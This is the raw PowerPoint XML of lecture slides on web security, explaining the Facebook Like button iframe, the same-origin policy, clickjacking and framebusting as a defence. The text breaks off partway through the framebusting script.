      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3329231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“Like” button work?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3124201"/>
            <a:ext cx="8229600" cy="2362199"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Like Button Requirements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Needs to access cookie for domain facebook.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Can be deployed on domains other than facebook.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Other scripts on the page should not be able to click Like button</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="http://chrisblattman.com/files/2011/07/facebook_like_button_big1-300x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476374"/>
            <a:ext cx="2857500" cy="12668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57200" y="5715000"/>
            <a:ext cx="8001000" cy="777875"/>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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isolate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the Like button from the rest of the page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29223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IFrames</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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1447800"/>
            <a:ext cx="4094492" cy="2537078"/>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623835" y="1422401"/>
            <a:ext cx="3986765" cy="2562476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="1676400"/>
            <a:ext cx="0" cy="103993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352800" y="1663700"/>
            <a:ext cx="0" cy="103993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569200" y="1623060"/>
            <a:ext cx="0" cy="103993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7950200" y="1610360"/>
            <a:ext cx="0" cy="103993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4800" y="4049145"/>
            <a:ext cx="4094492" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pages share same domain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4623835" y="4053486"/>
            <a:ext cx="3986765" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pages do not share same domain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Multiply 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010412" y="1610360"/>
            <a:ext cx="1468108" cy="986599"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">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20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="4953000"/>
            <a:ext cx="7620000" cy="1328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t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>same-origin policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> states that the DOM from one domain should not be able to access the DOM from a different domain </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2337500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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does the “Like” button work?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="537130" y="1295400"/>
            <a:ext cx="8069739" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5791200" y="1828801"/>
            <a:ext cx="0" cy="2362199"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">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81314" y="3242310"/>
            <a:ext cx="8205486" cy="1634490"/>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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> id="f5b9bb75c" name="f2f3fdd398" scrolling="no" title="Like this content on Facebook." class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fb_ltr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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>www.facebook.com/plugins/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>like.php?api_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=116656161708917..." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>style="border: none; overflow: hidden; height: 20px; width: 80px;"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481314" y="5147309"/>
            <a:ext cx="8205486" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The same-origin policy prevents the host from clicking the button and from checking if it’s clicked</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4237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Frames for Evil</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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4609901" y="2989507"/>
            <a:ext cx="4153099" cy="1353893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4609901" y="5016376"/>
            <a:ext cx="4153099" cy="1460624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4609901" y="1189001"/>
            <a:ext cx="4153099" cy="1184740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="430192" y="1189001"/>
            <a:ext cx="3150861" cy="2011399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Down Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343550" y="2430190"/>
            <a:ext cx="685800" cy="445659"/>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4" name="Down Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6332663" y="4425978"/>
            <a:ext cx="685800" cy="445659"/>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5" name="Right Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3933396" y="1544788"/>
            <a:ext cx="551592" cy="468741"/>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endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885743" y="3429000"/>
            <a:ext cx="3047653" cy="3048000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If pages with sensitive buttons can be put in an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, then it may be possible to perform a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283795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Clickjacking</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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5092262" y="3702049"/>
            <a:ext cx="3200400" cy="126682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1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Click for a FREE i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ad!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://chrisblattman.com/files/2011/07/facebook_like_button_big1-300x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736208"/>
            <a:ext cx="28575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6477000" y="5565008"/>
            <a:ext cx="546721" cy="835792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371601"/>
            <a:ext cx="8229600" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>occurs when a malicious site tricks the user into clicking on some element on the page unintentionally.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-18394" y="6158531"/>
            <a:ext cx="8857593" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Slides modeled after presentation by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Lin-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Shung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Huang at USENIX 2012.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Paper: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Lin-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Shung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Huang, Alex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Moshchuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, Helen J. Wang, Stuart Schechter, and Collin Jackson. 2012. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>: attacks and defenses. In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0"/>
              <a:t>Proceedings of the 21st USENIX conference on Security symposium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> (Security'12). USENIX Association, Berkeley, CA, USA, 22-22.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24773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3.7037E-6 L -0.00486 -0.19699 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-243" y="-9861"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="7" presetID="63" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.33333E-6 1.48148E-6 L 0.46041 -0.00347 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2050"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="23021"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Framebusting</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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480349" y="1159389"/>
            <a:ext cx="8206451" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Framebusting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>is a technique where a page stops functioning when included in a frame.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" i="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Snip Diagonal Corner Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621174" y="2522538"/>
            <a:ext cx="7901651" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="snip2Diag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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  if(top != self) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>top.location.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>self.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
